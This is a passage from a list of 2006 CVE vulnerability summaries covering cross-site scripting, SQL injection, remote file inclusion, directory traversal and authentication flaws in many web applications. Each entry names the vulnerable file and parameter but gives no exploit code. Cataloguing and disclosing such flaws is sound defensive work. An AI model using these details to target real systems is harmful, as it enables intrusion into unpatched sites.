ViewHostingServicePage.class.php, (64) ViewInvoicePage.class.php, (65) ViewLogMessagePage.class.php, (66) ViewOrderPage.class.php, (67) ViewProductPage.class.php, (68) ViewServerPage.class.php, (69) WelcomeEmailPage.class.php [CVE-2006-4988] Multiple cross-site scripting (XSS) vulnerabilities in Patrick Michaelis Wili-CMS allow remote attackers to inject arbitrary web script or HTML via (1) the query string to relocate.php, (2) the globals[pageid] parameter in example-view/inc/print_button.php, and other unspecified vectors. [CVE-2006-4985] Multiple cross-site scripting (XSS) vulnerabilities in Grayscale BandSite CMS allow remote attackers to inject arbitrary web script or HTML via (1) the max_file_size_purdy parameter in adminpanel/includes/helpfiles/help_mp3.php, (2) the message_text parameter in adminpanel/includes/mailinglist/sendemail.php, (3) the this_year parameter in includes/footer.php, and the band parameter in (4) adminpanel/includes/helpfiles/help_news.php (5) adminpanel/includes/helpfiles/help_merch.php, (6) adminpanel/includes/header.php, and (7) adminpanel/login_header.php [CVE-2006-4975] Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service. [CVE-2006-4972] Cross-site scripting (XSS) vulnerability in archive/index.php/forum-4.html in MyBB (aka MyBulletinBoard) allows remote attackers to inject arbitrary web script or HTML via the navbits[][name] parameter. [CVE-2006-4969] Multiple PHP remote file inclusion vulnerabilities in WAHM E-Commerce Pie Cart Pro allow remote attackers to execute arbitrary PHP code via a URL in the Inc_Dir parameter in (1) affiliates.php, (2) orders.php, (3) events.php, (4) index.php, (5) articles.php, (6) faqs.php, (7) guestbook.php, (8) catalog.php, (9) wholesale.php, (10) weblinks.php, (11) certificates.php, (12) sitesearch.php, (13) contact.php, (14) sitemap.php, (15) search.php, (16) registry.php, or (17) error.php. [CVE-2006-4967] Multiple cross-site scripting (XSS) vulnerabilities in NextAge Cart allow remote attackers to inject arbitrary web script or HTML via (1) the CatId parameter in a product category action in index.php or (2) the SearchWd parameter in an index search action in index.php. [CVE-2006-4965] Apple QuickTime 7.1.3 Player and Plug-In allows remote attackers to execute arbitrary JavaScript code and possibly conduct other attacks via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter that identifies resources outside of the original domain. NOTE: as of 20070912, this issue has been demonstrated by using instances of Components.interfaces.nsILocalFile and Components.interfaces.nsIProcess to execute arbitrary local files within Firefox and possibly Internet Explorer. [CVE-2006-4964] Cross-site scripting (XSS) vulnerability in MAXdev MDPro 1.0.76 before 20060918 allows remote attackers to inject arbitrary web script or HTML via (1) vectors that bypass the XSS protection mechanisms of the pnVarCleanFromInput function, and (2) unspecified vectors related to the AntiCracker. [CVE-2006-4960] Cross-site scripting (XSS) vulnerability in index.php Php Blue Dragon 2.9.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the m parameter, which is reflected in an error message resulting from a failed SQL query. [CVE-2006-4959] Sun Secure Global Desktop (SSGD, aka Tarantella) before 4.3 allows remote attackers to obtain sensitive information, including hostnames, versions, and settings details, via unspecified vectors, possibly involving (1) taarchives.cgi, (2) ttaAuthentication.jsp, (3) ttalicense.cgi, (4) ttawlogin.cgi, (5) ttawebtop.cgi, (6) ttaabout.cgi, or (7) test-cgi. NOTE: This information is based upon a vague initial disclosure. Details will be updated as they become available. [CVE-2006-4958] Multiple cross-site scripting (XSS) vulnerabilities in Sun Secure Global Desktop (SSGD, aka Tarantella) before 4.20.983 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving (1) taarchives.cgi, (2) ttaAuthentication.jsp, (3) ttalicense.cgi, (4) ttawlogin.cgi, (5) ttawebtop.cgi, (6) ttaabout.cgi, or (7) test-cgi. NOTE: This information is based upon a vague initial disclosure. Details will be updated as they become available. [CVE-2006-4956] Cross-site scripting (XSS) vulnerability in the updateuser servlet in Neon WebMail for Java before 5.08 allows remote attackers to inject arbitrary web script or HTML via the in_name parameter, as used by the Name field. [CVE-2006-4955] Directory traversal vulnerability in the downloadfile servlet in Neon WebMail for Java before 5.08 allows remote attackers to read arbitrary files via a .. (dot dot) sequence in the (1) savefolder and (2) savefilename parameters. [CVE-2006-4954] The updateuser servlet in Neon WebMail for Java before 5.08 does not validate the in_id parameter, which allows remote attackers to modify information of arbitrary users, as demonstrated by modifying (1) passwords and (2) permissions, (3) viewing profile settings, and (4) creating and (5) deleting users. [CVE-2006-4953] Multiple SQL injection vulnerabilities in Neon WebMail for Java before 5.08 allow remote attackers to execute arbitrary SQL commands via the (1) adr_sortkey and (2) adr_sortkey_desc parameters in the (a) addrlist servlet, and the (3) sortkey and (4) sortkey_desc parameters in the (b) maillist servlet. [CVE-2006-4952] The updatemail servlet in Neon WebMail for Java before 5.08 allows remote attackers to move e-mail messages of arbitrary users between different mail folders, specified by the folderid and tofolderid parameters, via the ID parameter. [CVE-2006-4951] Neon WebMail for Java before 5.08 allows remote attackers to execute arbitrary Java (JSP) code by sending an e-mail message with a JSP file attachment, which is stored under the web root with a predictable filename. [CVE-2006-4949] Cross-site scripting (XSS) vulnerability in the Drupal 4.6 Site Profile Directory (profile_pages.module) before 1.1.2.1 and the Drupal 4.7 Site Profile Directory (profile_pages.module) before 1.2.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "lack of validation on output," possibly in the name and title parameters. [CVE-2006-4947] Cross-site scripting (XSS) vulnerability in the Drupal 4.7 Search Keywords module before 1.15 2006/09/15 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "lack of validation on output." [CVE-2006-4946] PHP remote file inclusion vulnerability in include/startup.inc.php in CMSDevelopment Business Card Web Builder (BCWB) 0.99, and possibly 2.5 Beta and earlier, allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter. [CVE-2006-4945] Multiple PHP remote file inclusion vulnerabilities in Cardway (aka Frederic Boudaud) DigitalWebShop 1.128 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _PHPLIB[libdir] parameter to (1) rechnung.php or (2) prepend.php. [CVE-2006-4941] Multiple cross-site scripting (XSS) vulnerabilities in Moodle before 1.6.2 might allow remote attackers to inject arbitrary web script or HTML via (1) the choose parameter in files/index.php and (2) the sub parameter in doc/index.php. [CVE-2006-4923] Cross-site scripting (XSS) vulnerability in search.php in eSyndiCat Portal System allows remote attackers to inject arbitrary web script or HTML via the what parameter. [CVE-2006-4917] Cross-site scripting (XSS) vulnerability in search.php in PT News 1.7.8 allows remote attackers to inject arbitrary web script or HTML via the pgname parameter. [CVE-2006-4915] Cross-site scripting (XSS) vulnerability in index.php in Innovate Portal 2.0 allows remote attackers to inject arbitrary web script or HTML via the content parameter. [CVE-2006-4909] Cross-site scripting (XSS) vulnerability in Cisco Guard DDoS Mitigation Appliance before 5.1(6), when anti-spoofing is enabled, allows remote attackers to inject arbitrary web script or HTML via certain character sequences in a URL that are not properly handled when the appliance sends a meta-refresh. [CVE-2006-4907] OSU 3.11alpha and 3.10a allows remote attackers to obtain sensitive information via a URL to a non-existent file, which displays the web root path in the resulting error message. [CVE-2006-4899] The ePPIServlet script in Computer Associates (CA) eTrust Security Command Center 1.0 and r8 up to SP1 CR2, when running on Windows, allows remote attackers to obtain the web server path via a "'" (single quote) in the PIProfile function, which leaks the path in an error message. [CVE-2006-4897] CMtextS 1.0 and earlier stores users_logins/admin.txt under the web document root with insufficient access control, which allows remote attackers to obtain the administrator password. [CVE-2006-4894] Cross-site scripting (XSS) vulnerability in forms/lostpassword.php in iDevSpot NixieAffiliate 1.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2006-4886] The VirusScan On-Access Scan component in McAfee VirusScan Enterprise 7.1.0 and Scan Engine 4.4.00 allows local privileged users to bypass security restrictions and disable the On-Access Scan option by opening the program via the task bar and quickly clicking the Disable button, possibly due to an interface-related race condition. [CVE-2006-4884] Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot iSupport 1.8 allow remote attackers to inject arbitrary web script or HTML via (1) the suser parameter in support/rightbar.php, (2) the ticket_id parameter in support/open_tickets.php, and (3) the cons_page_title parameter in index.php. NOTE: the provenance of this information is unknown [CVE-2006-4883] Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot BizDirectory allow remote attackers to inject arbitrary web script or HTML via (1) the stylesheet parameter in Feed.php or (2) the message parameter in status.php. [CVE-2006-4881] Multiple cross-site scripting (XSS) vulnerabilities in David Bennett PHP-Post (PHPp) 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the replyuser parameter in (a) pm.php [CVE-2006-4874] Multiple cross-site scripting (XSS) vulnerabilities in Jupiter CMS allow remote attackers to inject arbitrary web script or HTML via the (1) language[Admin name] and (2) language[Admin back] parameters in (a) modules/blocks.php [CVE-2006-4856] Multiple cross-site scripting (XSS) vulnerabilities in Roller WebLogger 2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, or (3) url parameters [CVE-2006-4848] DISPUTED Multiple PHP remote file inclusion vulnerabilities in Brian Fraval Hitweb 3.0 allow remote attackers to execute arbitrary PHP code via a URL in the REP_CLASS parameter to (1) index.php, (2) arbo.php, (3) framepoint.php, (4) genpage.php, (5) lienvalider.php, (6) appreciation.php, (7) partenariat.php, (8) rechercher.php, (9) projet.php, (10) propoexample.php, (11) refererpoint.php, or (12) top50.php. NOTE: this issue has been disputed by a third party researcher, stating that REP_CLASS is initialized in an included file before being used. [CVE-2006-4843] Cross-site scripting (XSS) vulnerability in the Active Content Filter feature in IBM Lotus Domino before 6.5.6 and 7.x before 7.0.2 FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified "code sequences" that bypass the protection scheme. [CVE-2006-4838] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal SE 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) root_url and (2) dcp_version parameters in (a) admin/inc/footer.inc.php, and the root_url, (3) page_top_name, (4) page_name, and (5) page_options parameters in (b) admin/inc/header.inc.php. [CVE-2006-4829] Multiple cross-site scripting (XSS) vulnerabilities in David Czarnecki Blojsom 2.31 allow remote attackers to inject arbitrary web script or HTML via the (1) blog-category-description, (2) blog-entry-title, (3) rss-enclosure-url, (4) technorati-tagsi, or (5) blog-category-name parameter in a blog post. [CVE-2006-4825] Multiple cross-site scripting (XSS) vulnerabilities in cl_files/index.php in SoftComplex PHP Event Calendar 1.5.1, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) ti, (2) bi, or (3) cbgi parameters. [CVE-2006-4822] Multiple cross-site scripting (XSS) vulnerabilities in index.php in eMuSOFT emuCMS 0.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) query or (2) page parameters. [CVE-2006-4821] Cross-site scripting (XSS) vulnerability in the Drupal 4.7 Userreview module before 1.19 2006/09/12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4797] Cross-site scripting (XSS) vulnerability in tag.php in CloudNine Interactive CJ Tag Board 3.0 allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a url BBcode tag in the cjmsg parameter. [CVE-2006-4796] Cross-site scripting (XSS) vulnerability in forum.asp in Snitz Forums 2000 3.4.06 allows remote attackers to inject arbitrary web script or HTML via the sortorder parameter (strtopicsortord variable). [CVE-2006-4794] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the query string (PATH_INFO) in (1) contact.php, (2) download.php, (3) admin.php, (4) fpw.php, (5) news.php, (6) search.php, (7) signup.php, (8) submitnews.php, and (9) user.php. NOTE: the provenance of this information is unknown [CVE-2006-4784] Multiple cross-site scripting (XSS) vulnerabilities in Moodle 1.6.1 and earlier might allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) doc/index.php or (2) files/index.php. [CVE-2006-4783] SQL injection vulnerability in squads.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands via the squadID parameter. [CVE-2006-4782] src/index.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to bypass authentication and gain sensitive information stored in the database via a modified userID parameter in a write action to admin/database.php. [CVE-2006-4772] HotPlug CMS stores sensitive information under the web root with insufficient access control, which allows remote attackers to read the admin password and database credentials via a direct request for includes/class/config.inc. [CVE-2006-4771] Cross-site scripting (XSS) vulnerability in haut.php in ForumJBC 4 allows remote attackers to inject arbitrary web script or HTML via the nb_connecte parameter. [CVE-2006-4763] IBM Lotus Domino Web Access (DWA) 7.0.1 does not expire a client's Lightweight Third-Party Authentication token (LtpaToken) upon logout, which allows remote attackers to obtain a user's privileges by intercepting the LtpaToken cookie. [CVE-2006-4762] Multiple cross-site scripting (XSS) vulnerabilities in Ykoon RssReader allow remote attackers to inject arbitrary web script or HTML via a web feed, as demonstrated by certain test cases of the Robert Auger and Caleb Sima RSS and Atom feed reader test suite. [CVE-2006-4761] Multiple cross-site scripting (XSS) vulnerabilities in Luke Hutteman SharpReader allow remote attackers to inject arbitrary web script or HTML via a web feed, as demonstrated by certain test cases of the Robert Auger and Caleb Sima RSS and Atom feed reader test suite. [CVE-2006-4760] Multiple cross-site scripting (XSS) vulnerabilities in Benjamin Pasero and Tobias Eichert RSSOwl allow remote attackers to inject arbitrary web script or HTML via a web feed, as demonstrated by certain test cases of the Robert Auger and Caleb Sima RSS and Atom feed reader test suite. [CVE-2006-4755] Cross-site scripting (XSS) vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the letter parameter. NOTE: the provenance of this information is unknown [CVE-2006-4754] Cross-site scripting (XSS) vulnerability in index.php in PHProg before 1.1 allows remote attackers to inject arbitrary web script or HTML via the album parameter, which is used in an opendir call. NOTE: the same primary issue can be used for full path disclosure with an invalid parameter that reveals the installation path in an error message. [CVE-2006-4751] Cross-site scripting (XSS) vulnerability in index.php in Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the errcode parameter. [CVE-2006-4747] Multiple cross-site scripting (XSS) vulnerabilities in IdevSpot TextAds allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter in delete.php and (2) the error parameter in error.php. [CVE-2006-4746] PHP remote file inclusion vulnerability in news/include/customize.php in Web Server Creator 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the l parameter. [CVE-2006-4742] Cross-site scripting (XSS) vulnerability in user_add.php in IDevSpot PhpLinkExchange 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2006-4739] Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the OriginalImageData parameter to phpthumb.php. [CVE-2006-4737] SQL injection vulnerability in index.php in Jetbox CMS allows remote attackers to inject arbitrary web script or HTML via the item parameter. NOTE: The view vector is already covered by CVE-2006-3586.2. [CVE-2006-4733] PHP remote file inclusion vulnerability in sipssys/code/box.inc.php in Haakon Nilsen simple, integrated publishing system (SIPS) 0.3.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the config[sipssys] parameter. NOTE: the product's documentation recommends placing the affected file outside of the web root, so the scope of issue is limited to admins who do not, or cannot, follow this recommendation. [CVE-2006-4727] Cross-site scripting (XSS) vulnerability in emfadmin/statusView.do in Tumbleweed EMF Administration Module 6.2.2 Build 4123, and possibly other versions before 6.3.2, allows remote attackers to inject arbitrary web script or HTML via the (1) lineId and (2) sort parameters. [CVE-2006-4726] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 6.1 through 7.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a ColdFusion error page. [CVE-2006-4723] PHP remote file inclusion vulnerability in raidenhttpd-admin/slice/check.php in RaidenHTTPD 1.1.49, when register_globals and WebAdmin is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SoftParserFileXml parameter. [CVE-2006-4719] Multiple PHP remote file inclusion vulnerabilities in MyABraCaDaWeb 1.0.3, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the base parameter to (1) index.php or (2) pop.php. [CVE-2006-4718] Multiple cross-site scripting (XSS) vulnerabilities in livre_or.php in KorviBlog 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) prenom, (2) emailFrom, or (3) body parameters. [CVE-2006-4712] Multiple cross-site scripting (XSS) vulnerabilities in Sage 1.3.6 allow remote attackers to inject arbitrary web script or HTML via JavaScript in a content:encoded element within an item element in an RSS feed, as demonstrated by four example content:encoded elements that use XMLHttpRequest to read arbitrary local files, aka "Cross Context Scripting." [CVE-2006-4711] Multiple cross-site scripting (XSS) vulnerabilities in Sage allow remote attackers to inject arbitrary web script or HTML via an Atom 1.0 feed, as demonstrated by certain test cases of the James M. Snell Atom 1.0 feed reader test suite. [CVE-2006-4710] Multiple cross-site scripting (XSS) vulnerabilities in NewsGator FeedDemon before 2.0.0.25 allow remote attackers to inject arbitrary web script or HTML via an Atom 1.0 feed, as demonstrated by certain test cases of the James M. Snell Atom 1.0 feed reader test suite. [CVE-2006-4708] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1b allow remote attackers to inject arbitrary web script or HTML via the (1) act parameter in (a) help.php and (b) search.php, and the (2) p parameter in report.php. [CVE-2006-4707] Cross-site scripting (XSS) vulnerability in admin/global.php (aka the Admin CP login form) in MyBB (aka MyBulletinBoard) 1.1.7 allows remote attackers to inject arbitrary web script or HTML via the query string ($_SERVER[PHP_SELF]). [CVE-2006-4706] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.1.7 allows remote attackers to inject arbitrary web script or HTML via a url BBCode tag that contains a javascript URI with an SGML numeric character reference and an embedded space, as demonstrated using "java& #115 [CVE-2006-4695] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via a crafted URL, aka "Office Web Components URL Parsing Vulnerability." [CVE-2006-4686] Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. [CVE-2006-4684] The docutils module in Zope (Zope2) 2.7.0 through 2.7.9 and 2.8.0 through 2.8.8 does not properly handle web pages with reStructuredText (reST) markup, which allows remote attackers to read arbitrary files via a csv_table directive, a different vulnerability than CVE-2006-3458. [CVE-2006-4668] Cross-site scripting (XSS) vulnerability in index.php in Rob Hensley AckerTodo 4.0 allows remote attackers to inject arbitrary web script or HTML via the task_id parameter in an edit_task command. [CVE-2006-4665] Cross-site scripting (XSS) vulnerability in index.php in MKPortal M1.1 Rc1 allows remote attackers to inject arbitrary web script or HTML via the ind parameter, possibly related to the PHP_SELF variable. NOTE: Some details are obtained from third party information. [CVE-2006-4661] AOL ICQ Toolbar 1.3 for Internet Explorer (toolbaru.dll) does not properly validate the origin of the configuration web page (options2.html), which allows user-assisted remote attackers to provide a web page that contains disguised checkboxes that trick the user into reconfiguring the toolbar. [CVE-2006-4659] The Panda Platinum Internet Security 2006 10.02.01 and 2007 11.00.00 uses predictable URLs for the spam classification of each message, which allows remote attackers to cause Panda to classify arbitrary messages as spam via a web page that contains IMG tags with the predictable URLs. NOTE: this issue could also be regarded as a cross-site request forgery (CSRF) vulnerability. [CVE-2006-4657] Panda Platinum Internet Security 2006 10.02.01 and 2007 11.00.00 stores service executables under the product's installation directory with weak permissions, which allows local users to obtain LocalSystem privileges by modifying (1) WebProxy.exe or (2) PAVSRV51.EXE. [CVE-2006-4656] PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition. [CVE-2006-4654] Format string vulnerability in Easy Address Book Web Server 1.2 allows remote attackers to cause a denial of service (crash) or "compromise the server" via encoded format string specifiers in the query string. [CVE-2006-4653] (1) Amazing Little Poll and (2) Amazing Little Picture Poll store sensitive information under the web root with insufficient access control, which allows remote attackers to read the admin password via a direct request for the lp_settings file (lp_settings.inc or lp_settings.php). [CVE-2006-4646] Cross-site scripting (XSS) vulnerability in the Drupal 4.7 Pathauto module before pathauto_node.inc 1.17.2.1 and the Drupal 4.6 Pathauto module before pathauto_node.inc 1.14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4635] Unspecified vulnerability in MySource Classic 2.14.6, and possibly earlier, allows remote authenticated users, with superuser privileges, to inject arbitrary PHP code via unspecified vectors related to the Equation attribute in Web_Extensions - Notitia (I/II). NOTE: due to lack of details, it is not clear whether this issue is file inclusion, static code injection, or another type of issue. [CVE-2006-4634] Cross-site scripting (XSS) vulnerability in index.php in VBZooM allows remote attackers to inject arbitrary web script or HTML via the UserID parameter, a different vector than CVE-2006-1133 and CVE-2005-2441. [CVE-2006-4628] Cross-site scripting (XSS) vulnerability in VCD-db before 0.983 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when handling comments. [CVE-2006-4620] The useredit_account.wdm module in Alt-N WebAdmin 3.2.5 running with MDaemon 9.0.6, and possibly earlier versions, allows remote authenticated domain administrators to gain privileges and obtain access to the system mail queue by modifying the mailbox of the MDaemon user account to use the mailbox of another account. [CVE-2006-4608] Multiple cross-site scripting (XSS) vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cadena parameter in busqueda.php and the (2) email parameter in lista.php. [CVE-2006-4603] NCH Swift Sound Web Dictate 1.02 allows remote attackers to bypass authentication via a null password. [CVE-2006-4595] muforum (\xC1forum) 0.4c stores membres/members.dat under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and password hashes. [CVE-2006-4593] Cross-site scripting (XSS) vulnerability in index.php in SoftBB 0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-4587] Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM 4.2.4, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) description parameter in unspecified modules or the (2) solution parameter in the HelpDesk module. [CVE-2006-4577] Multiple cross-site scripting (XSS) vulnerabilities in The Address Book 1.04e allow remote attackers to inject arbitrary web script or HTML via Javascript events in the (1) email, (2) websites, and (3) groupAddName parameters in (a) save.php [CVE-2006-4576] Cross-site scripting (XSS) vulnerability in The Address Book 1.04e allows remote attackers to inject arbitrary web script or HTML by uploading the HTML file with a GIF or JPG extension, which is rendered by Internet Explorer. [CVE-2006-4563] Cross-site scripting (XSS) vulnerability in the MyHeadlines before 4.3.2 module for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the myh_op parameter to modules.php. [CVE-2006-4562] DISPUTED The proxy DNS service in Symantec Gateway Security (SGS) allows remote attackers to make arbitrary DNS queries to third-party DNS servers, while hiding the source IP address of the attacker. NOTE: another researcher has stated that the default configuration does not proxy DNS queries received on the external interface. [CVE-2006-4561] Mozilla Firefox 1.5.0.6 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running. [CVE-2006-4560] Internet Explorer 6 on Windows XP SP2 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running. [CVE-2006-4552] Cross-site scripting (XSS) vulnerability in CHXO Feedsplitter 2006-01-21 allows remote attackers to inject arbitrary web script or HTML via the RSS feed. [CVE-2006-4543] Cross-site scripting (XSS) vulnerability in index.php in HLStats 1.34 allows remote attackers to inject arbitrary web script or HTML via the (1) game parameter in players mode, the (2) weapon parameter in weaponinfo mode, the (3) st parameter in search mode, the (4) action parameter in actioninfo mode, and the (5) map parameter in mapinfo mode. [CVE-2006-4542] Webmin before 1.296 and Usermin before 1.226 do not properly handle a URL with a null ("%00") character, which allows remote attackers to conduct cross-site scripting (XSS), read CGI program source code, list directories, and possibly execute programs. [CVE-2006-4540] Cross-site scripting (XSS) vulnerability in learncenter.asp in Learn.com LearnCenter allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2006-4528] Multiple cross-site scripting (XSS) vulnerabilities in membrepass 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) recherche parameter in recherchemembre.php and the (2) email parameter in test.php. [CVE-2006-4525] Cross-site scripting (XSS) vulnerability in CubeCart 3.0.12 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the links array. [CVE-2006-4500] Cross-site scripting (XSS) vulnerability in index.php in ezPortal/ztml CMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) about, (2) again, (3) lastname, (4) email, (5) password, (6) album, (7) id, (8) table, (9) desc, (10) doc, (11) mname, (12) max, (13) htpl, (14) pheader, and possibly other parameters. [CVE-2006-4497] SQL injection vulnerability in comments.php in IwebNegar 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2006-4496] Cross-site scripting (XSS) vulnerability in comments.php in IwebNegar 1.1 allows remote attackers to inject arbitrary web script or HTML via the comment parameter. [CVE-2006-4487] DUware DUpoll 3.0 and 3.1 stores _private/Dupoll.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and passwords. [CVE-2006-4483] The cURL extension files (1) ext/curl/interface.c and (2) ext/curl/streams.c in PHP before 5.1.5 permit the CURLOPT_FOLLOWLOCATION option when open_basedir or safe_mode is enabled, which allows attackers to perform unauthorized actions, possibly related to the realpath cache. [CVE-2006-4480] Incomplete blacklist vulnerability in the nk_CSS function in nuked.php in Nuked-Klan 1.7 SP4.3 allows remote attackers to bypass anti-XSS features and inject arbitrary web script or HTML via JavaScript in an attribute value that is not in the blacklist, as demonstrated using the STYLE attribute of a B element. [CVE-2006-4479] Cross-site scripting (XSS) vulnerability in loginreq2.php in Visual Shapers ezContents 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the subgroupname parameter. [CVE-2006-4474] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.11 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters in (1) Admin Module Manager, (2) Admin Help, and (3) Search. [CVE-2006-4460] Cross-site scripting (XSS) vulnerability in PHP iAddressBook before 0.96 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-4454] Cross-site scripting (XSS) vulnerability in hlstats.php in HLstats 1.34 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-4453] Cross-site scripting (XSS) vulnerability in PmWiki before 2.1.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "table markups". [CVE-2006-4452] PHP remote file inclusion vulnerability in security/include/_class.security.php in Web3news 0.95 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the PHPSECURITYADMIN_PATH parameter. [CVE-2006-4450] usercp_avatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request. [CVE-2006-4449] Cross-site scripting (XSS) vulnerability in attachment.php in MyBulletinBoard (MyBB) 1.1.7 and possibly other versions allows remote attackers to inject arbitrary web script or HTML via a GIF image that contains URL-encoded Javascript, which is rendered by Internet Explorer. [CVE-2006-4442] Cross-site scripting (XSS) vulnerability in PHP iAddressBook before 0.95 allows remote attackers to inject arbitrary web script or HTML via the cat_name parameter, related to adding a category. (categories field). NOTE: some details are obtained from third party information. [CVE-2006-4438] Heap-based buffer overflow in SpIDer for Dr.Web Scanner for Linux 4.33, and possibly earlier versions, allows remote attackers to execute arbitrary code via an LHA archive with an extended header that contains a long directory name. [CVE-2006-4421] Cross-site scripting (XSS) vulnerability in template/default/thanks_comment.php in Yet Another PHP Image Gallery (YaPIG) 0.95b allows remote attackers to inject arbitrary web script or HTML via the D_REFRESH_URL parameter. [CVE-2006-4412] WebKit in Apple Mac OS X 10.3.x through 10.3.9 and 10.4 through 10.4.8 allows remote attackers to execute arbitrary code via a crafted HTML file, which accesses previously deallocated objects. [CVE-2006-4399] User interface inconsistency in Workgroup Manager in Apple Mac OS X 10.4 through 10.4.7 appears to allow administrators to change the authentication type from crypt to ShadowHash passwords for accounts in a NetInfo parent, when such an operation is not actually supported, which could result in less secure password management than intended. [CVE-2006-4387] Apple Mac OS X 10.4 through 10.4.7, when the administrator clears the "Allow user to administer this computer" checkbox in System Preferences for a user, does not remove the user's account from the appserveradm or appserverusr groups, which still allows the user to manage WebObjects applications. [CVE-2006-4376] Multiple cross-site scripting (XSS) vulnerabilities in Guder und Koch Netzwerktechnik Eichhorn Portal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly including the (1) profil_nr and (2) sprache parameters in the main portion of the portal, the (3) suchstring field in suchForm in the main portion of the portal, the (4) GaleryKey and (5) Breadcrumbs parameters in the gallerie module, and the (6) GGBNSaction parameter in the ggbns module. [CVE-2006-4371] Multiple directory traversal vulnerabilities in Alt-N WebAdmin 3.2.3 and 3.2.4 running with MDaemon 9.0.5, and possibly earlier, allow remote authenticated global administrators to read arbitrary files via a .. (dot dot) in the file parameter to (1) logfile_view.wdm and (2) configfile_view.wdm. [CVE-2006-4370] Alt-N WebAdmin 3.2.3 and 3.2.4 running with MDaemon 9.0.5, and possibly earlier, allow remote authenticated domain administrators to change a global administrator's password and gain privileges via the userlist.wdm file. [CVE-2006-4362] Cross-site scripting (XSS) vulnerability in getad.php in Diesel Paid Mail allows remote attackers to inject arbitrary web script or HTML via the ps parameter. [CVE-2006-4361] Multiple cross-site scripting (XSS) vulnerabilities in jobseekers/forgot.php in Diesel Job Site allow remote attackers to inject arbitrary web script or HTML via the (1) uname or 